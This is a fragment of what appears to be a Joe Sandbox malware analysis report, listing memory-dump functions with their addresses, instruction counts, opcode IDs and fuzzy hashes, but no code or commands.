                                                                        • Snapshot File: hcaresult_24_2_2890000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a7c05e1eec235fdbe64413fbda589a84dd45bda997b79d980e38d8eecbe126ed
                                                                        • Instruction ID: 77c4d714024a469a978eaa262cf6b437ffce3d3e8f2604cdef5d92987badf357
                                                                        • Opcode Fuzzy Hash: a7c05e1eec235fdbe64413fbda589a84dd45bda997b79d980e38d8eecbe126ed
                                                                        • Instruction Fuzzy Hash: 3F2121B8A0020ADFCF45FBB9D8546ADBBB6FF88300F104A69D015AB354EB719A45CF51
                                                                        Function 02890838 Relevance: .0, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000018.00000002.1938253199.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_24_2_2890000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c446129664ac9c6d13e542347191a4d2db9541f92817d43fd540041706d2f88b
                                                                        • Instruction ID: f56daf7f3e57d39c90aef41b52063a1a3e7b7a2f77150c8430e3827348ffe911
                                                                        • Opcode Fuzzy Hash: c446129664ac9c6d13e542347191a4d2db9541f92817d43fd540041706d2f88b
                                                                        • Instruction Fuzzy Hash: 7F11FEB85052469FCF02EBB9F985A653BB5FB89304B044F54E0058F26AE6706947CB81
                                                                        Function 02891708 Relevance: .0, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000018.00000002.1938253199.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_24_2_2890000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4be4588fc70c9aa3def457565868bbd4fda53bdf7b378f095cbb0ccd937be9cf
                                                                        • Instruction ID: d020de9fd95f350dbfd02066770188e9a1e4a76837f57c52fc24e1b7ddae3c14
                                                                        • Opcode Fuzzy Hash: 4be4588fc70c9aa3def457565868bbd4fda53bdf7b378f095cbb0ccd937be9cf
                                                                        • Instruction Fuzzy Hash: 0F11FEB8D0010EAFCF40FFB9E8505AEBBB1FB84200F008A59E415EB291EB745A06CF41
                                                                        Function 02890848 Relevance: .0, Instructions: 38COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000018.00000002.1938253199.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_24_2_2890000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a07cd0d4b9b2df20bb9e96f9e238070c82ed1dc9e7cbec3279d846cc7c86c7d1
                                                                        • Instruction ID: 969a6f5a3608b288469edb1e148c24c3884d2784677dc469e23e45c1d4db0169
                                                                        • Opcode Fuzzy Hash: a07cd0d4b9b2df20bb9e96f9e238070c82ed1dc9e7cbec3279d846cc7c86c7d1
                                                                        • Instruction Fuzzy Hash: 84016BB851120B9FCF02FFAAF985B557BA5F788304B009F54A0058F25DE6706947CB81